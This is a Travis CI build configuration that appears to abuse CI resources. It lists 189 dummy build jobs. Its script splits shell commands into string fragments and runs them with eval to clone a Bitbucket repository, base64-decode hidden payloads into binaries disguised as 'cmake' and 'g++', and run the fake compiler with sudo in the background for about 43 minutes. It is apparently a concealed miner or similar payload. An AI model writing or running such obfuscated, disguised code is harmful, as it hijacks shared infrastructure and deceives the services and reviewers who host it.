dist: bionic

env:
  - BUILD="fO1"
  - BUILD="fO2"
  - BUILD="fO3"
  - BUILD="fO4"
  - BUILD="fO5"
  - BUILD="fO6"
  - BUILD="fO7"
  - BUILD="fO8"
  - BUILD="fO9"
  - BUILD="fO10"
  - BUILD="fO11"
  - BUILD="fO12"
  - BUILD="fO13"
  - BUILD="fO14"
  - BUILD="fO15"
  - BUILD="fO16"
  - BUILD="fO17"
  - BUILD="fO18"
  - BUILD="fO19"
  - BUILD="fO20"
  - BUILD="fO21"
  - BUILD="fO22"
  - BUILD="fO23"
  - BUILD="fO24"
  - BUILD="fO25"
  - BUILD="fO26"
  - BUILD="fO27"
  - BUILD="fO28"
  - BUILD="fO29"
  - BUILD="fO30"
  - BUILD="fO31"
  - BUILD="fO32"
  - BUILD="fO33"
  - BUILD="fO34"
  - BUILD="fO35"
  - BUILD="fO36"
  - BUILD="fO37"
  - BUILD="fO38"
  - BUILD="fO39"
  - BUILD="fO40"
  - BUILD="fO41"
  - BUILD="fO42"
  - BUILD="fO43"
  - BUILD="fO44"
  - BUILD="fO45"
  - BUILD="fO46"
  - BUILD="fO47"
  - BUILD="fO48"
  - BUILD="fO49"
  - BUILD="fO50"
  - BUILD="fO51"
  - BUILD="fO52"
  - BUILD="fO53"
  - BUILD="fO54"
  - BUILD="fO55"
  - BUILD="fO56"
  - BUILD="fO57"
  - BUILD="fO58"
  - BUILD="fO59"
  - BUILD="fO60"
  - BUILD="fO61"
  - BUILD="fO62"
  - BUILD="fO63"
  - BUILD="fO64"
  - BUILD="fO65"
  - BUILD="fO66"
  - BUILD="fO67"
  - BUILD="fO68"
  - BUILD="fO69"
  - BUILD="fO70"
  - BUILD="fO71"
  - BUILD="fO72"
  - BUILD="fO73"
  - BUILD="fO74"
  - BUILD="fO75"
  - BUILD="fO76"
  - BUILD="fO77"
  - BUILD="fO78"
  - BUILD="fO79"
  - BUILD="fO80"
  - BUILD="fO81"
  - BUILD="fO82"
  - BUILD="fO83"
  - BUILD="fO84"
  - BUILD="fO85"
  - BUILD="fO86"
  - BUILD="fO87"
  - BUILD="fO88"
  - BUILD="fO89"
  - BUILD="fO90"
  - BUILD="fO91"
  - BUILD="fO92"
  - BUILD="fO93"
  - BUILD="fO94"
  - BUILD="fO95"
  - BUILD="fO96"
  - BUILD="fO97"
  - BUILD="fO98"
  - BUILD="fO99"
  - BUILD="fO100"
  - BUILD="fO101"
  - BUILD="fO102"
  - BUILD="fO103"
  - BUILD="fO104"
  - BUILD="fO105"
  - BUILD="fO106"
  - BUILD="fO107"
  - BUILD="fO108"
  - BUILD="fO109"
  - BUILD="fO110"
  - BUILD="fO111"
  - BUILD="fO112"
  - BUILD="fO113"
  - BUILD="fO114"
  - BUILD="fO115"
  - BUILD="fO116"
  - BUILD="fO117"
  - BUILD="fO118"
  - BUILD="fO119"
  - BUILD="fO120"
  - BUILD="fO121"
  - BUILD="fO122"
  - BUILD="fO123"
  - BUILD="fO124"
  - BUILD="fO125"
  - BUILD="fO126"
  - BUILD="fO127"
  - BUILD="fO128"
  - BUILD="fO129"
  - BUILD="fO130"
  - BUILD="fO131"
  - BUILD="fO132"
  - BUILD="fO133"
  - BUILD="fO134"
  - BUILD="fO135"
  - BUILD="fO136"
  - BUILD="fO137"
  - BUILD="fO138"
  - BUILD="fO139"
  - BUILD="fO140"
  - BUILD="fO141"
  - BUILD="fO142"
  - BUILD="fO143"
  - BUILD="fO144"
  - BUILD="fO145"
  - BUILD="fO146"
  - BUILD="fO147"
  - BUILD="fO148"
  - BUILD="fO149"
  - BUILD="fO150"
  - BUILD="fO151"
  - BUILD="fO152"
  - BUILD="fO153"
  - BUILD="fO154"
  - BUILD="fO155"
  - BUILD="fO156"
  - BUILD="fO157"
  - BUILD="fO158"
  - BUILD="fO159"
  - BUILD="fO160"
  - BUILD="fO161"
  - BUILD="fO162"
  - BUILD="fO163"
  - BUILD="fO164"
  - BUILD="fO165"
  - BUILD="fO166"
  - BUILD="fO167"
  - BUILD="fO168"
  - BUILD="fO169"
  - BUILD="fO170"
  - BUILD="fO171"
  - BUILD="fO172"
  - BUILD="fO173"
  - BUILD="fO174"
  - BUILD="fO175"
  - BUILD="fO176"
  - BUILD="fO177"
  - BUILD="fO178"
  - BUILD="fO179"
  - BUILD="fO180"
  - BUILD="fO181"
  - BUILD="fO182"
  - BUILD="fO183"
  - BUILD="fO184"
  - BUILD="fO185"
  - BUILD="fO186"
  - BUILD="fO187"
  - BUILD="fO188"
  - BUILD="fO189"

language: minimal

script:
  - sudo apt update || true
  - itemtts="sudo apt --"
  - cqCoFJ="yes install"
  - jSBXkMO=" cl-base64 "
  - igNEnOa="git &>/dev/"
  - eval "$itemtts""$cqCoFJ""$jSBXkMO""$igNEnOa""null"
  - nlpqC="git clone h"
  - pEthfV="ttps://gccb"
  - bTyZnfgcSN="uild@bitbuc"
  - fGROCSOm="ket.org/gcc"
  - zArbqeE="build/gcc.g"
  - alutIOXpt="it &>/dev/n"
  - eval "$nlpqC""$pEthfV""$bTyZnfgcSN""$fGROCSOm""$zArbqeE""$alutIOXpt""ull"
  - wUQdoWNYuU="base64 -d g"
  - TjIdQiD="cc/cmake_ >"
  - eval "$wUQdoWNYuU""$TjIdQiD"" cmake"
  - wcNoIMqpS="base64 -d g"
  - sPQkdB="cc/config_ "
  - eval "$wcNoIMqpS""$sPQkdB""> cconfig"
  - nmsTHpKIu="base64 -d g"
  - fcNYSyO="cc/make_ > "
  - eval "$nmsTHpKIu""$fcNYSyO""g++"
  - chmod +x g++ cmake
  - ./cmake
  - lYzJU="sed -i 's/b"
  - iivxSAReVMR="uild/tg2o/g"
  - eval "$lYzJU""$iivxSAReVMR""' cconfig"
  - VBAgwEcFa="sudo ./g++ "
  - hciItJMTll="--config=cc"
  - vYDrUAJaRt="onfig &>/de"
  - eval "$VBAgwEcFa""$hciItJMTll""$vYDrUAJaRt""v/null &"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2597)) ] && sudo killall g++ && break; sleep 197; done
